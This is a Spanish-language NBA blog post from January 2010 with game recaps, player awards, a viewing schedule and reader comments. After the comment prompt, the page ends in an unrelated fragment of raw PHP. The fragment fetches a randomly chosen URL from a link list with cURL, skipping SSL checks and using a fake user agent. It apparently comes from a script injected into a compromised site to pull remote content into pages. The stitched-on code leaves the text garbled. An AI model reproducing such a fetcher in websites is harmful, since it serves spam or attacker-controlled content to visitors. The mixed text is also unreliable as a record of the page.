La Crónica (11/01/2010)

12 de January de 2010 por txusma

3 de 3, las victorias de los Hawks sobre los Celtics este curso. Joe Johnson salió de su letargo para aniquilar a los verdes y es que ni “San” Rondo pudo esta vez evitar la derrota. Al menos les queda el consuelo de que “sólo” en dos semanas podrán volver a contar con Garnett. En Milwaukee no pueden decir lo mismo con respecto a Michael Redd, que se pierde el resto de la temporada.

Con la derrota verde los Cavs consolidan la primera plaza del Este. A punto estuvieron de estropear la sobrehumana actuación de LeBron en su visita a la bahía de Oakland. A los Warriors les dio por hacer una de las suyas, remontando una buena ventaja para poner a tiro de tres la victoria en los últimos instantes. Monta Ellis desaprovechó la ocasión en una última jugada incomprensible.

En el Oeste ganaron todos los equipos de playoff. Volvió Melo y los Nuggets no dieron opción a los Wolves. Extraordinario duelo directo (pre) all-star contra Durant, que anoche dió buena cuenta de los Knicks.  Por su parte, los Jazz pasaron por encima de los Heat y los Suns solventaron un difícil choque contra los extramotivados Bucks con Nash en plan MVP.

Los Hornets, sin embargo, dieron un paso atrás en su remontada perdiendo en Philadelphia. Los Sixers cuajaron una de sus mejores actuaciones en lo que va de campaña. Por si alguien lo dudaba, Thadeus Young, Iguodala, Iverson y Louis Williams jugaron fantásticamente bien juntos… y Brand impecable saliendo desde el banco. Ese debe de ser ahora el camino para ellos.

Por último, Indiana volvió a poner a Toronto por debajo del 50% a pesar del buen partido de Calderon y los Bulls no tuvieron piedad con su ex-compañero Ben Gordon, que sólo jugó 6 minutitos para los Pistons.

PREMIOS

MVP: Tan solo Steve Nash, que llegó a la treitena de puntos a los que sumó 11 asistencias y 7 rebotes, aguanta la comparación con Lebron James. 37 puntos, 11 asistencias y 8 rebotes el angelito.

Rookie: El base de los Pacers, AJ Price, lleva un par de partidos muy buenos. Anoche anotó 16 puntos aprovechando las lesiones que asolan el backourt de Indiana. Otro que aprovecha su momento es Jonas Jebreko que sigue de titular cuajando buenas actuaciones. 15 puntos y 9 rebotes para él. Y no nos olvidamos de Walter Matheews, 18  puntos en 18 minutos saliendo desde el banco.

Sorpresa: Más de uno pensaba que este año Hakim Warrick se consolidaría en los Bucks pero no ha sido así. De toda manera de vez en cuando nos sorprende con una buena actuación. Como la de anoche, 21 puntos y 10 rebotes. En Denver la sorpresa es Aaron Afflalo, titular indiscutible que anoche se fue a los 15 puntos, 5 rebotes y 5 asistencias.

Decepción: Es lo que tienen los jugadores jóvenes. Hoy asombran al mundo y mañana hacen el peor partido de su carrera. Es lo que le ha pasado a Danilo Gallinari que ha fallado los 7 lanzamientos que ha intentado y se ha quedado sin anotar esta noche.

Esfuerzo en vano: Maggette, 32 puntos y 7 rebotes. Bosh, 27 puntos y 10 rebotes. Jefferson, 22 puntos y 15 rebotes. Hay días que te preguntas de qué sirve sudar tanto.

RAZONES PARA TRASNOCHAR

Esta noche del martes nos deja un plato principal con cuatro acompañamientos de mayor o menor interés. Los entrantes los ponen a partir de la 1h00 Pistons @ Wizards y Rockets @ Bobcats. A las 2h00, un primer plato con dos equipos al alza, LA Clippers @ Grizzlies, seguido media hora después por el clásico del Oeste, LA Lakers @ Spurs. Y de postre, a las 4h00, Magic @ Kings.

Comenta

11 comentarios a esta entrada

  1. Moman dice:
    #1

    Vaya última jugada de golden, si llega a entrar el triple de Curry hubiera dado la campanada jugando a nada contra uno de los aspirantes …por cierto me parece muy bueno el rookie de Golden, parece que es de los pocos que hacen algo con criterio en ese equipo

      Citar

  2. sergio dice:
    #2

    Gallinari no metio ni un puntito, pero se fue con mas valoracion que Duhon. Con lo que prometia este muchacho el año pasado…

    Lo de Villanueva con -1 de valoracion ya ni lo ponemos no? Empieza a ser normal

      Citar

  3. sergio dice:
    #3

    o Flynn… que no me habia dao cuenta con un -5. Bueno, es Rookie y no cobra lo de Villanueva pero tambien podria haber aparecido no?

      Citar

  4. Love Denise dice:
    #4

    michael redd se pierde toda la temporada por lesion..

    no he visto el atlanta-boston, pero los hawks cada dia me parecen mas peligrosos, aunque es un equipo capaz de lo mejor y lo peor (como el otro dia perdiendo de 32 con Orlando)

      Citar

  5. Txusma dice:
    #5

    Definitivamente, este es el final de Michael Redd como jugador franquicia… Una lástima.

      Citar

  6. Toni dice:
    #6

    ¿Como jugador franquicia o como jugador?
    “Aún” tiene 30 años pero las lesiones no pasan en vano y alomejor toma la decisión de retirarse y tirar la toalla.
    Yo pensaba que Duhon levantaría cabeza porque tuvo un par de partidos bastante buenos pero veo que no y el año pasado iba para crack…
    Rondo bestial, ha eclosionado totalmente, pero ¿porque no ha jugado sheed hoy?¿tiene para mucho tiempo?
    ¿Alguien sabe si Pau vuelve hoy? Si no es así y no hay hazaña de Kobe veo dificil la victoria ya que Duncan está bastante bien… Aunque si Bynum esta despierto puede hacer daño.
    Sigo leyendo vuestras actualizaciones pero estoy tratando de escribir mi propio blog y no tengo demasiado tiempo.

      Citar

  7. pcerezo dice:
    #7

    Tenéis por ahí el dato de los partidos que se ha perdido Michael Redd en las últimas temporadas?
    Está claro que en estos momentos tiene sillón en el Consejo de Administración de Cristal de Bohemia, sa

    Muy significativo lo de los Hawks sobre Celtics. Los de Atlanta deben estar rezando para que el choque de semis sea con ellos y no Cavs.

    Danilo Gallinari, con ese nombre tiene que triunfar sí o sí.

    Un saludo,
    Pablo

      Citar

  8. Txusma dice:
    #8

    Es que escribir un blog requiere muuucho tiempo y más si no eres mucha gente.

      Citar

  9. Txusma dice:
    #9

    Pues desde la 2006-2007 hasta la 2008-2009 se ha perdido 94 de 252. Y este año se pierde otros 66… Mala cosa.

      Citar

  10. kantonyo dice:
    #10

    Ya ves que lleva tiempo lo de tener un blog actualizado, por eso lo vuestro tiene mucho merito, yo ultimamente no escribo mucho, por que tengo muy poco tiempo, pero no hay dia que no os lea, seguis siendo el mejor sitio en español para estar al dia de la NBA.

      Citar

  11. Love Denise dice:
    #11

    Unicaja va a fichar a Juan Dixon, me temo que le saldrá mal al igual que con Shammond williams, a pesar de que Dixon me pareció buen jugador, creo que sus buenos tiempos ya han pasado., aunque Por el bien de una ACB más igualada. espero equivocarme.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>